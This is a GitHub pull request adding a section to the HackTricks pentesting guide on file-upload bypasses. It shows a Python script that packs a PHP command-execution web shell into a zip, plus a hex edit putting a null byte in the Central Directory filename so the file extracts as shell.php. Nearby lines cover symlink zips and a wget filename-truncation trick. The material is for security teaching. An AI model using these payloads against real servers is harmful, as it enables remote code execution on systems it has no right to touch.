### PR TITLE
Add decompress with a different name section for file upload part.

### DIFF
--- a/pentesting-web/file-upload.md
+++ b/pentesting-web/file-upload.md
@@ -239,7 +239,7 @@ def create_zip():
 create_zip()
 ```
 
-Note that the name has a space inside of it. Now you can edit the generated zip file with an hex editor, and change this char in the field name placed inside the Central Directory Header :
+Note that the name has a space inside of it. Now you can edit the generated zip file with an hex editor, and change this char in the field name placed inside the Central Directory Header by a null byte `00`:
 
 ```bash
 # before changing the name of the file inside the Central Directory header

--- a/pentesting-web/file-upload.md
+++ b/pentesting-web/file-upload.md
@@ -55,7 +55,7 @@ Try also to **upload an executable** \(.exe\) or an **.html** \(less suspicious\
 
 {% embed url="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20insecure%20files" %}
 
-If you are trying to upload files to a **PHP server**, [take a look at the **.htaccess** trick to execute code](https://book.hacktricks.xyz/pentesting/pentesting-web/php-tricks-esp#code-execution-via-httaccess).  
+If you are trying to upload files to a **PHP server**, [take a look at the **.htaccess** trick to execute code](https://book.hacktricks.xyz/pentesting/pentesting-web/php-tricks-esp#code-execution-via-httaccess).
 If you are  trying to upload files to an **ASP server**, [take a look at the **.config** trick to execute code](../pentesting/pentesting-web/iis-internet-information-services.md#execute-config-files).
 
 The `.phar` files are like the `.jar` for java, but for php, and can be **used like a php file** \(executing it with php, or including it inside a script...\)
@@ -66,7 +66,7 @@ The `.inc` extension is sometimes used for php files that are only used to **imp
 
 ## **wget File Upload/SSRF Trick**
 
-In some occasions you may find that a server is using **`wget`** to **download files** and you can **indicate** the **URL**. In these cases, the code may be checking that the extension of the downloaded files is inside a whitelist to assure that only allowed files are going to be downloaded. However, **this check can be bypassed.**  
+In some occasions you may find that a server is using **`wget`** to **download files** and you can **indicate** the **URL**. In these cases, the code may be checking that the extension of the downloaded files is inside a whitelist to assure that only allowed files are going to be downloaded. However, **this check can be bypassed.**
 The **maximum** length of a **filename** in **linux** is **255**, however, **wget** truncate the filenames to **236** characters. You can **download a file called "A"\*232+".php"+".gif"**, this filename will **bypass** the **check** \(as in this example **".gif"** is a **valid** extension\) but `wget` will **rename** the file to **"A"\*232+".php"**.
 
 ```bash
@@ -87,7 +87,7 @@ HTTP request sent, awaiting response... 200 OK
 Length: 10 [image/gif]
 Saving to: ‘AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php’
 
-AAAAAAAAAAAAAAAAAAAAAAAAAAAAA 100%[===============================================>]      10  --.-KB/s    in 0s      
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAA 100%[===============================================>]      10  --.-KB/s    in 0s
 
 2020-06-13 03:14:06 (1.96 MB/s) - ‘AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php’ saved [10/10]
 ```
@@ -124,7 +124,7 @@ Here’s a top 10 list of things that you can achieve by uploading \(from  [link
 
 If you can upload a ZIP that is going to be decompressed inside the server, you can do 2 things:
 
-## Symlink 
+## Symlink
 
 Upload a link containing soft links to other files, then, accessing the decompressed files you will access the linked files:
 
@@ -150,8 +150,8 @@ Some python code to create a malicious zip:
 ```python
 #!/usr/bin/python
 import zipfile
-from cStringIO import StringIO 
- 
+from cStringIO import StringIO
+
 def create_zip():
     f = StringIO()
     z = zipfile.ZipFile(f, 'w', zipfile.ZIP_DEFLATED)
@@ -160,9 +160,9 @@ def create_zip():
     z.close()
     zip = open('poc.zip','wb')
     zip.write(f.getvalue())
-    zip.close() 
- 
-create_zip() 
+    zip.close()
+
+create_zip()
 ```
 
 To achieve remote command execution I took the following steps:
@@ -170,7 +170,7 @@ To achieve remote command execution I took the following steps:
 1. Create a PHP shell:
 
 ```php
-<?php 
+<?php
 if(isset($_REQUEST['cmd'])){
     $cmd = ($_REQUEST['cmd']);
     system($cmd);
@@ -214,6 +214,54 @@ Only one step remained: Upload the ZIP file and let the application decompress i
 [![b1](https://blog.silentsignal.eu/wp-content/uploads/2014/01/b1-300x106.png)](https://blog.silentsignal.eu/wp-content/uploads/2014/01/b1.png)
 
 **Reference**: [https://blog.silentsignal.eu/2014/01/31/file-upload-unzip/](https://blog.silentsignal.eu/2014/01/31/file-upload-unzip/)
+
+## Decompress with a different name
+
+Sometimes an application will block the loading of a file by checking its extension inside the zip file. If this verification is superficial, ie by checking the name of the file inside the local field header, it can be circumvented by making the application believe that the file has such an extension, whereas it will have another once decompressed.
+
+We can reuse the previous script to make a zip file.
+
+```python
+#!/usr/bin/python
+
+import zipfile
+from cStringIO import StringIO
+
+def create_zip():
+    f = StringIO()
+    z = zipfile.ZipFile(f, 'w', zipfile.ZIP_DEFLATED)
+    z.writestr('shell.php .pdf', '<?php echo system($_REQUEST["cmd"]); ?>')
+    z.close()
+    zip = open('poc.zip','wb')
+    zip.write(f.getvalue())
+    zip.close()
+
+create_zip()
+```
+
+Note that the name has a space inside of it. Now you can edit the generated zip file with an hex editor, and change this char in the field name placed inside the Central Directory Header :
+
+```bash
+# before changing the name of the file inside the Central Directory header
+00000080: 0000 0073 6865 6c6c 2e70 6870 202e 7064  ...shell.php .pd
+# after changing the name of the file inside the Central Directory header
+00000080: 0000 0073 6865 6c6c 2e70 6870 002e 7064  ...shell.php..pd
+```
+
+When the application will check the filename of the file inside the zip, the name used for this check will be the name of the local file header, **but not if the zip is encrypted** (see the pkzip specification). The name used to store the file will be the name of the central directory header when 7z or unzip see a difference between the two names. Thanks to the null byte, the name will be `shell.php`.
+
+When decompressed :
+
+```bash
+7z e poc.zip
+ls
+shell.php
+```
+**References**:
+
+[https://users.cs.jmu.edu/buchhofp/forensics/formats/pkzip.html](https://users.cs.jmu.edu/buchhofp/forensics/formats/pkzip.html)
+
+[https://pkware.cachefly.net/webdocs/casestudies/APPNOTE.TXT](https://pkware.cachefly.net/webdocs/casestudies/APPNOTE.TXT)
 
 # ImageTragic
 
@@ -261,5 +309,4 @@ More information in: [https://medium.com/swlh/polyglot-files-a-hackers-best-frie
 - **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
 
 </details>
-
 


### PR DESCRIPTION
Hello,

I thought it could be interesting to add another trick about file upload vulnerability. The technic consist of using a null byte inside the central directory header, at the name field. When a library, such as ZipArchive in php will check the name, it will be the name of the Local File Heade. But when 7z or unzip will decompress this archive, the name used to store the file will be the name placed inside the Central Directory Header.

This is just a little trick, let me know if you think it is interesting. I can do the french translation.

Before change :

![image](https://github.com/carlospolop/hacktricks/assets/61985948/6ebb47cf-9e85-40a8-bfea-caa81e27d8fc)

After :

![image](https://github.com/carlospolop/hacktricks/assets/61985948/9c4872d7-41cf-4305-bbff-82b6d812c81a)

Note : the leading withespaces inside the md were automatically removed by vscode.
